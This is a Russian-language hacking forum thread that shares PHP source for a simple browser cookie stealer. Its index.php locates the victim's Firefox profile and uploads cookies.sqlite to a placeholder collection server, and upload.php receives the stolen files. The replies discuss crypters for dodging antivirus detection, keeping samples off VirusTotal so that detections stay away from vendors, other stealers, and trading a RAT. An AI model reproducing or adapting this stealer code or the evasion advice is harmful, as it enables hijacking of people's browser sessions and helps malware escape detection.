Немного слов про Стилер

[X-Shar]

Кто-нить пробовал ?

Что-то у меня так ничего и не стырил, видно в 32 уже профиксили...

Кому лень качать там два файла:

Спойлер: Index.php

Скопировать в буфер обмена

<?PHP
function ip_log(){
    $data = "12783162312378912783918923";
    preg_match_all("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/",$data,$ip);
    return $ip;
}
function upload($file){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_VERBOSE, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_VERBOSE,true);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/31.0 (compatible;)");
    curl_setopt($ch, CURLOPT_URL, "http://yoursite.com/upload.php");
    curl_setopt($ch, CURLOPT_POST, true);
    // same as <input type="file" name="file_box">
    $post = array(
  "uploadedfile"=> "@$file",
        );
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    $response = curl_exec($ch);
}

$windir =  trim(shell_exec('echo %windir%')) . "\\";
$windir = substr($windir,0, 2);
$ip = ip_log();
$data = shell_exec("dir " . (escapeshellarg($windir . "\Documents and Settings" . "\\" . get_current_user() . "\\" . "Application Data\Mozilla\Firefox\Profiles")));

    if($data != "")
    {
        preg_match_all("/<DIR> +(.*\.default)/",$data,$pname);  // search for the profile name
        $data = shell_exec("dir " . (escapeshellarg($windir . "\Documents and Settings" . "\\" . get_current_user() . "\\" . "Application Data\Mozilla\Firefox\Profiles\\" . $pname[1][0])));
        preg_match_all("/Directory of (.*)/",$data,$loc);  //get the exact cookie's path
        upload($loc[1][0] . "\cookies.sqlite",$ip . "_cookies.sqlite");
    }
    else
    {
        $data = shell_exec("dir " . (escapeshellarg($windir . "\Users" . "\\" . get_current_user() . "\\" . "Application Data\Mozilla\Firefox\Profiles")));
        preg_match_all("/<DIR> +(.*\.default)/",$data,$pname);  // search for the profile name
        $data = shell_exec("dir " . (escapeshellarg($windir . "\Users" . "\\" . get_current_user() . "\\" . "Application Data\Mozilla\Firefox\Profiles\\" . $pname[1][0])));
        preg_match_all("/Directory of (.*)/",$data,$loc);  //get the exact cookie's path
        upload($loc[1][0] . "\cookies.sqlite",$ip . "_cookies.sqlite");
    }

?>

Спойлер: upload.php

Скопировать в буфер обмена

<?PHP

$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file ".  basename( $_FILES['uploadedfile']['name']).
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>

У меня выводит:There was an error uploading the file, please try again! похоже не работает уже !

 

[Антоха]

Кто-нить пробовал ?

Неа.Но на Левеле все были довольны.Это типа старый способ,но его решили слить в паблик.

 

[Антоха]

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Как можно посмотреть чужие логи со стилера.И как защитить себя от такого вмешательства.

 

[seledkapod]

Всё вроде работает.Единственная пичалька,что палится даже Защитником Виндовс.

Эммм, про крипторы не? Не слышали? И еще не советую на вирустотал вообще что либо заливать, особенно файлы криптованные паблик крипторами. Вирустотал сливает всю инфу напрямую в антивирусные компании и потому-то паблик крипторы так долго и не живут. Пользуйтесь

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

например, он не сливает пока вроде.

 

[X-Shar]

Эммм, про крипторы не? Не слышали? И еще не советую на вирустотал вообще что либо заливать, особенно файлы криптованные паблик крипторами. Вирустотал сливает всю инфу напрямую в антивирусные компании и потому-то паблик крипторы так долго и не живут. Пользуйтесь

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

например, он не сливает пока вроде.

Спасибо за советы, мы всегда рады активности в хак. разделе...

Но не надо думать что мы-уж совсем такие деревянные, разумеется мы знаем что VT сливает инфу, также знаем про крипторы, также что и крипторые есть разные, есть например которые скрывают от сканеров, но при этом палятся при запуске...

Что касается слития на VT, тут вроде никто и не сливает, либо ОЧЕНЬ редко, только для теста, дело в том что бесплатные сканеры типо например того-же

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

не всегда даёт правдивые результаты, где-то я даже здесь на форуме приводил пример, неправильных результатов, т.е. вирус не детектился по версии viruscheckmate.com а на самом деле детект был на VT.

И ещё скажу что VT либо очень долго сливает некоторые вирусы, либо какие-то стабы/вирусы несливает вообще, видно это зависит от-того как вирус распространяется...

 

[Антоха]

Эммм, про крипторы не? Не слышали? И еще не советую на вирустотал вообще что либо заливать, особенно файлы криптованные паблик крипторами.

Как приятно лицезреть на нашем форуме столь благовоспитанных,грамотных и учтивых пользователей!Вы внесли неоценимый вклад в ликвидацию безграмотности на нашем деревенском ресурсе.Мы обязательно прислушаемся к вашим мудрым советам.
P.S.А вот писать недопосты в теме,чтобы увидеть текст из-под хайда очень нехорошо.Обычно за это получают бан.Но вам,как опытному наставнику школоло-троянщиков,вынесли только предупреждение.Не делайте больше так.

 

[seledkapod]

Ммм, наставник школоло-троянщиков, круто

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

не ваш ли это отчет на VT? Да и надо же внести хоть какое-то разнообразие на вашем форуме А тот пост да, нужен был пак кодеров, признаю грешок)) Ну я кстати за него так сказать поделился rat-ом.

 

[Антоха]

не ваш ли это отчет на VT

А,хрен знает,может и мой.Вы думаете пристыдить меня этим отчётом?Зря.Я бессовестный)Все эти побрякушки-крипторыстилероботнеты мне совершенно безразличны как инструмент хакира.Меня интересует лишь функциональность и работоспособность этих тулз.А своим отчётом ВТ можете пугать молодёжь на каком-нибудь хэппи-хаке.

 

[seledkapod]

А,хрен знает,может и мой.Вы думаете пристыдить меня этим отчётом?Зря.Я бессовестный)Все эти побрякушки-крипторыстилероботнеты мне совершенно безразличны как инструмент хакира.Меня интересует лишь функциональность и работоспособность этих тулз.А своим отчётом ВТ можете шугать молодёжь на каком-нибудь хэппи-хаке.

https://ru-sphere.ru/threads/pony-stealer-1-9.1810/ С этой темы отчет, и пугать я никого и не собирался, просто как бы благодаря таким вот отчетам потом паблик крипт непалящийся хрен найдешь. Не имею ввиду что именно вы конкретно в этом виноваты.

 

[Антоха]

как бы благодаря таким вот отчетам потом паблик крипт непалящийся хрен найдешь.

Уважаемый!Этот стилер древний как го.но мамонта.До меня его заливали-перезаливали тысячу раз.Актуальные кодерские поделки я на ВТ не лью.Даже дерьмовые пабликовские испанские крипторы и то проверяю на нормальных сервисах.
А то,что вы пользуетесь подобными крипторами-ваша проблема.Засим откланяюсь,дабы ненароком не оскорбить вас или что хуже-забанить за такие выпады.Всего вам хорошего!